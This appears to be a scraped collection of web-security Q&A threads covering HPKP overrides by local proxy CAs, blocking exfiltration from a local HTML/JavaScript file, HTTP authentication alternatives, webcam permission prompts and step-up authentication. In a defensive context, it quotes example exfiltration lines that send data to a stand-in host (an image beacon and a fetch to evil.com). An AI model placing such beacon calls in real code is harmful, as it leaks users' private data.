Chrome and Safari not honoring HPKP

I added an HPKP header to my site, but it is not honored by Chrome or Safari. I tested this manually by setting a proxy and by going to chrome://net-internals/#hsts and looking for my domain, which was not found. The HPKP header seems correct, and I also validated it with an HPKP toolset, so I know it is valid.
I am thinking I might be doing something weird with my flow. I have a web app, which is served from myapp.example.com. On login, the app redirects the user to authserver.example.com/begin to initiate an OpenID Connect Authorization Code flow. The HPKP header is returned only from authserver.example.com/begin, which I suspected might be the issue, but since I have includeSubDomains in the HPKP header, I don't think that is the problem.
This is the HPKP header (line breaks added for readability):
public-key-pins:max-age=864000;includeSubDomains; \
pin-sha256="bcppaSjDk7AM8C/13vyGOR+EJHDYzv9/liatMm4fLdE="; \
pin-sha256="cJjqBxF88mhfexjIArmQxvZFqWQa45p40n05C6X/rNI="; \
report-uri="https://reporturl.example"
Thanks!

I added an HPKP header to my site, but it is not honored by Chrome or Safari... I tested it manually by setting a proxy...
RFC 7469, Public Key Pinning Extension for HTTP, kind of sneaks that past you. The IETF published it with overrides, so an attacker can break a known good pinset. The override is mentioned once in the standard by name, but the details are not provided. The IETF also failed to discuss it in a Security Considerations section.
More to the point, the proxy you set up engaged the override. It does not matter whether it's your own proxy, a proxy certificate installed by a mobile device OEM, or a proxy controlled by an attacker who tricked a user into installing it. The web security model and the standard allow it; they embrace interception and consider it a valid use case.
Something else they did was make reporting of the broken pinset a MUST NOT or SHOULD NOT, which means the user agent is complicit in the cover-up, too. That's not discussed in a Security Considerations section, either. They really don't want folks to know their supposedly secure connection is being intercepted.
Your best bet to avoid it is to move outside the web security model. Don't use browser-based apps when security is a concern; use a hybrid app and perform the pinning yourself. Your hybrid app can still host a WebView control or view, but you get access to the channel so you can verify its parameters yourself. Also see OWASP's Certificate and Public Key Pinning.
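To make the idea concrete, here is a minimal sketch of doing the pin check yourself, written Node.js-style only because it keeps the example short; the host name and pin value come from the question, and everything else (including the choice of runtime) is just an assumption for illustration:

const https = require('https');
const crypto = require('crypto');
const tls = require('tls');

// The expected pin: base64 SHA-256 of the server's SubjectPublicKeyInfo,
// copied from the pin-sha256 value in the question.
const EXPECTED_PIN = 'bcppaSjDk7AM8C/13vyGOR+EJHDYzv9/liatMm4fLdE=';

const req = https.request({
  hostname: 'authserver.example.com',
  path: '/begin',
  checkServerIdentity: (host, cert) => {
    // Keep the normal hostname check...
    const hostErr = tls.checkServerIdentity(host, cert);
    if (hostErr) return hostErr;
    // ...then hash the DER-encoded public key and compare it to our own pin,
    // regardless of which root CAs (or proxy CAs) the platform happens to trust.
    const spki = crypto.createHash('sha256').update(cert.pubkey).digest('base64');
    if (spki !== EXPECTED_PIN) {
      return new Error('Public key pin mismatch: got ' + spki);
    }
  },
}, res => console.log('status:', res.statusCode));

req.on('error', err => console.error('connection rejected:', err.message));
req.end();

Because the comparison happens in your own code, an interception proxy's locally issued certificate fails the check instead of silently overriding it.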
Also see Comments on draft-ietf-websec-key-pinning on the IETF mailing list. One of the suggestions in the comments was to change the title to "Public Key Pinning Extension for HTTP with Overrides" to highlight the feature. Not surprisingly, that's not something they wanted; they are trying to do it surreptitiously, without user knowledge.
Here's the relevant text from RFC 7469:
2.7. Interactions with Preloaded Pin Lists
UAs MAY choose to implement additional sources of pinning
information, such as through built-in lists of pinning information.
Such UAs should allow users to override such additional sources,
including disabling them from consideration.
The effective policy for a Known Pinned Host that has both built-in
Pins and Pins from previously observed PKP header response fields is
implementation-defined.

Locally installed CAs (like the one used by the proxy you say you are running) override any HPKP checks.
This is necessary so as not to completely break the internet, given how prevalent they are: anti-virus software and proxies used in large corporations basically MITM HTTPS traffic through a locally issued certificate, as otherwise they could not read the traffic.
Some argue that locally installing a CA requires access to your machine, and at that point it's game over anyway, but to me this still massively reduces the protection HPKP offers. That, coupled with the high risks of using HPKP, means I am really not a fan of it.

Related

How to prevent HTML in file:/// from accessing the internet?

The background scenario is that I want to give my users a JavaScript file which they can use to analyze their sensitive private data, and I want them to feel safe that this data will not be sent to the internet.
Initially, I thought I'd just distribute it as an .html file with an embedded <script>, and that they'd simply open this .html file in the browser over the file:/// protocol, which gives some nice same-origin policy defaults.
But this won't really offer much security to my users: the JavaScript could easily create an <img src="https://evil.com?sensitive-data=${XYZ}"> tag, which would send a GET request to evil.com despite evil.com being a different origin, because embedding images from different origins is allowed by design.
Is there some practical way in which I could distribute my JavaScript, and/or for the end user to run such a script, so they can be reasonably sure it can't send the data over the internet?
(Unplugging the machine from the internet, installing a VM, or manipulating firewall settings are not practical.)
(Reasonably sure = assuming that the software they use, such as the browser, follows the spec and wasn't hacked.)
Please take a look at Content-Security-Policy.
https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/img-src
Supplementing your HTML with <meta http-equiv="Content-Security-Policy" content="img-src 'self';"> should disallow the browser from making requests to foreign resources.
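For example, a stricter policy along these lines blocks not just images but also fetch/XHR, frames, and fonts, while still allowing the embedded analysis script to run (this is only a sketch; how 'self' behaves under file:/// differs between browsers, so test in the browsers your users actually use):

<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <!-- default-src 'none' blocks every external request by default;
       the inline script and style are allowed back in explicitly. -->
  <meta http-equiv="Content-Security-Policy"
        content="default-src 'none'; script-src 'unsafe-inline'; style-src 'unsafe-inline'">
</head>
<body>
  <script>
    // Analysis code goes here. An attempt such as
    //   new Image().src = "https://evil.com/?sensitive-data=...";
    // should now be refused by the browser's CSP enforcement.
  </script>
</body>
</html>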
An alternative approach could be to develop your project in the form of a browser extension, where you can set up the content security policy quite precisely, including rules for inline scripting, executing string-to-JS methods, frame and font origins, and so on (https://developer.chrome.com/docs/apps/contentSecurityPolicy/).
As a bonus, you (and your users) get a free-of-charge code review from the security departments of the browser vendors.
Setting the browser's proxy in its settings to localhost:DUMMY_PORT looks like a safe solution for this case.
Deno is, to cite its website:
Deno is a simple, modern and secure runtime for JavaScript and TypeScript that uses V8 and is built in Rust.
Secure by default. No file, network, or environment access, unless explicitly enabled.
So this reduces the user's trust requirement to trusting Deno (and Chocolatey, if they want to use choco install deno to install it).
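A minimal sketch of what that looks like in practice (file names are made up); because --allow-net is never granted, Deno either refuses the network call outright or explicitly prompts the user first:

// analyze.ts — run with:  deno run --allow-read=data.csv analyze.ts
// Only read access to data.csv is granted; no network permission is given.
const text = await Deno.readTextFile("data.csv");
console.log("rows:", text.trim().split("\n").length);

try {
  // Any attempt to phone home is stopped by Deno's permission system.
  await fetch("https://evil.com/?sensitive-data=exfil");
} catch (err) {
  console.log("network access refused:", (err as Error).message);
}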

What are alternatives to HTTP authentication?

My site uses HTTP authentication, and I've learned it isn't very secure, that it causes a lot of problems for many browsers, and that not all browsers may support it. I want to use an alternative that is secure and more widely supported; what are some alternatives?
Is it possible to lock all directories using an HTML login page?
My site uses HTTP authentication and I've learned it isn't very secure
That's false... unless you're referring to something like basic auth over an insecure channel. In that case, anything over the insecure channel has potential issues. (Even if you did some client-side encryption hackery, you still have the problem that the remote host is not verified without the TLS or SSL layer.)
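(For context, basic auth just base64-encodes the credentials, so it is exactly as safe as the channel it travels over; a quick sketch of what the browser actually sends, with made-up values:)

// Illustrative only — what a basic auth request header looks like on the wire.
const user = 'alice';
const pass = 's3cret';
const header = 'Authorization: Basic ' + btoa(user + ':' + pass);
console.log(header);  // "Authorization: Basic YWxpY2U6czNjcmV0" — trivially decodable without TLS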
Basic auth is fine in some cases and not in others; it depends on what you're trying to do.
it causes a lot of problems for many browsers, and not all browsers may support it
Completely false. I've never seen a browser that didn't support basic auth and digest auth.
what are some alternatives?
This isn't possible to answer without a better understanding of your requirements. Two-factor auth with a DNA sample and a brainwave scan might be more secure but chances are that's not what you're looking for. Besides, you can't forget about the rest of your system and you've told us nothing about that.
Is it possible to lock all directories using an HTML login page?
Yes. How you do this depends on what you're running server-side, but it's completely possible and often done.
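As one possible sketch, assuming a Node.js/Express backend (every name here, including the private directory and the credential check, is hypothetical), a session check placed in front of the protected directory is all it takes:

// Hypothetical Express sketch: everything under /private/ requires a logged-in session.
const express = require('express');
const session = require('express-session');

const app = express();
app.use(session({ secret: 'change-me', resave: false, saveUninitialized: false }));
app.use(express.urlencoded({ extended: false }));

function requireLogin(req, res, next) {
  if (req.session.user) return next();
  res.redirect('/login.html');               // the HTML login page
}

app.post('/login', (req, res) => {
  // Replace with a real credential check against your user store.
  if (req.body.user === 'alice' && req.body.password === 'correct horse') {
    req.session.user = req.body.user;
    return res.redirect('/private/');
  }
  res.status(401).send('Bad credentials');
});

// Every "directory" under /private is gated by the session check.
app.use('/private', requireLogin, express.static('private'));

app.listen(3000);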

How to capture an image with the HTML5 webcam API without a security prompt

I need to capture an image from a web page without a security warning.
The page where I need webcam functionality cannot be switched to the HTTPS protocol.
I've installed root certificates and made them trusted.
I tried to insert an iframe (pointing to the secure https://mysecurepage.com) inside the page (http://mypage.com), but it did not work.
@bjelli is correct: this would be a major security flaw for any internet content. Just imagine if you could go to a website that started taking photos and recording everything going on, without any permission or notification!
However, I am working on an intranet project where disabling the prompt would be quite safe.
If you are in this sort of position, there is one thing you can do:
Google Chrome Policies
If you are deploying the browser, you can override the security prompt for sites you specify. I don't know if you are working in such an environment, but this is the only way you can avoid the prompt altogether. Similar options probably exist for other browsers too.
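For example, with Chrome's enterprise policies a managed policy file along these lines grants the listed origins access to the camera without prompting (the origin is a placeholder for your own intranet site; on Linux the file would typically go under /etc/opt/chrome/policies/managed/):

{
  "VideoCaptureAllowedUrls": ["https://intranet.example.com"]
}

Note this only removes the prompt for origins you control through policy; ordinary internet pages still get the prompt.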
As defined in http://www.w3.org/TR/mediacapture-streams/
When the getUserMedia() method is called, the user agent MUST run the following
steps:
[9 steps omitted]
Prompt the user in a user agent specific manner for permission to provide the
entry script's origin with a MediaStream object representing a media stream.
[...]
If the user grants permission to use local recording devices, user agents are
encouraged to include a prominent indicator that the devices are "hot" (i.e. an
"on-air" or "recording" indicator).
If the user denies permission, jump to the step labeled failure below. If the
user never responds, this algorithm stalls on this step.
If a browser does not behave as described here, it is a serious security problem. If you find a way of making a browser skip the permission prompt, you have found a security problem.
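For reference, this is the call the spec is describing; the prompt is shown by the browser itself and cannot be suppressed from page script (minimal sketch, assuming a <video> element exists on the page):

// Requesting the camera: the browser shows its permission prompt here.
navigator.mediaDevices.getUserMedia({ video: true })
  .then(stream => {
    // Only runs after the user explicitly grants access.
    document.querySelector('video').srcObject = stream;
  })
  .catch(err => {
    // Runs if the user denies access or no camera is available.
    console.error('getUserMedia failed:', err.name);
  });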
What do you do if you find a security problem?
Report it IMMEDIATELY! Wikipedia: Vulnerability Disclosure
Firefox: http://www.mozilla.org/security/#For_Developers
Internet Explorer: http://technet.microsoft.com/en-us/security/ff852094.aspx
Safari: https://ssl.apple.com/support/security/
Chrome: http://www.google.com/about/appsecurity/
Opera: http://www.opera.com/security/policy
This is not just a question of technical possibilities; it's also a question of professional ethics: What kind of job would I not take on? Should I be loyal to my customer, or should I think of the welfare of the public? When do I just follow orders, when do I stop bad stuff from happening, and when do I blow the whistle?
Here are some starting points for computing professionals to think about the ethics of their work:
http://www.acm.org/about/se-code
http://www.acm.org/about/code-of-ethics
http://www.ieee.org/about/corporate/governance/p7-8.html
http://www.gi.de/?id=120

Can WebAuthenticationBroker work with persistent cookies?

From the documentation on the WebAuthenticationBroker class, this object appears to exist to support Single-Sign-On scenarios as well as the OAuth2 flow I'm trying to use it for. As part of its behaviour, it seems to create a completely separate browsing environment from the rest of the system and actively purges all the persistent cookies generated via a sign-on process.
This causes the problem that each time my users enter my application, they are prompted to sign in with their credentials. This is counter to my expectations around SSO and would seem to make this class unsuitable for most scenarios.
Is there some way to make the cookies persist, as they would do in a normal browser, so that I don't have to 2-factor sign into my Google account yet again?

HTTP DELETE request with extra authentication

I was searching for a solution to the following problem, so far without success: I'm planning a RESTful web service where certain actions (e.g. DELETE) should require special authentication.
The idea is that users have a normal username/password login (session-based or Basic Auth, it doesn't really matter here) with which they can access the service. Some actions require additional authentication in the form of a PIN code or maybe even a one-time password. Including the extra piece of authentication in the login process is not possible (and would miss the point of the whole exercise).
I thought about special headers (something like X-OTP-Authentication), but that would make it impossible to access the service via a standard HTML page (there is no way to include a custom header in a link).
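From script the header idea would look roughly like this (the endpoint and variable name are made up, just to illustrate what I mean), but a plain link or form can't do it:

// Sketch only: send the one-time PIN in a custom header alongside the normal session auth.
fetch('/api/items/42', {
  method: 'DELETE',
  headers: { 'X-OTP-Authentication': otpEnteredByUser },
  credentials: 'include',   // keep the regular session cookie
}).then(res => {
  if (!res.ok) throw new Error('delete rejected: ' + res.status);
});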
Another option was HTTP query parameters, but that seems to be discouraged, especially for DELETE.
Any ideas how to tackle this problem?
From REST Web Service Security with jQuery Front-End
If you haven't already, I'd recommend some reading on OAuth 1.0 and 2.0. They are both used by some of the bigger APIs, such as Facebook, Netflix, Twitter, and more. 2.0 is still in draft, but that hasn't stopped anyone from implementing and using it, as it is simpler for a client to use. It sounds like you want something more complicated and more secure, so you might want to focus on 1.0.
I always found Netflix's Authentication Overview to be a good explanation for clients.